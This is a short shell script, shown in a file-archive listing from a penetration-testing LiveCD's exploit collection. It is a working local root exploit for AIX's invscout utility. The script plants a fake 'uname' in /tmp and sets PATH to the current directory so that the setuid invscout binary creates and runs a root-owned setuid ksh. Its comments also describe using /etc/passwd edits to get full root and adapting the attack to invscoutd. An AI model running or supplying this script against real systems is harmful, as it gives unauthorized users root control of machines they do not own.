home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / aix / local / getr00t.sh < prev    next >
Text File  |  2005-03-29  |  835b  |  27 lines
  1. #!/usr/bin/sh
  2. # r00t exploit written for the invscout bug reported by Idefense labs
  3. # http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities
  4. # coded by ri0t exploitation is trivial but automated with this script
  5. # www.ri0tnet.net
  6. #
  7. # usage ./getr00t.sh :)
  8. # exploitation gives euid(root) from here getting guid (root) is as simple as an
  9. # /etc/passwd edit 
  10. #
  11. # note this also works with invscoutd simple change the like thats says
  12. # /usr/sbin/invscout to /usr/sbin/invscoutd to exploit that
  13.  
  14.  
  15. cd /tmp
  16. echo '/usr/bin/cp /usr/bin/ksh ./' > uname
  17. echo '/usr/bin/chown root:system ./ksh' >> uname
  18. echo '/usr/bin/chmod 777 ./ksh' >> uname
  19. echo '/usr/bin/chmod +s ./ksh' >> uname
  20. /usr/bin/chmod 777 uname
  21. PATH=./
  22. export PATH
  23. /usr/sbin/invscout
  24. PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
  25. export PATH
  26. exec /tmp/ksh 
  27.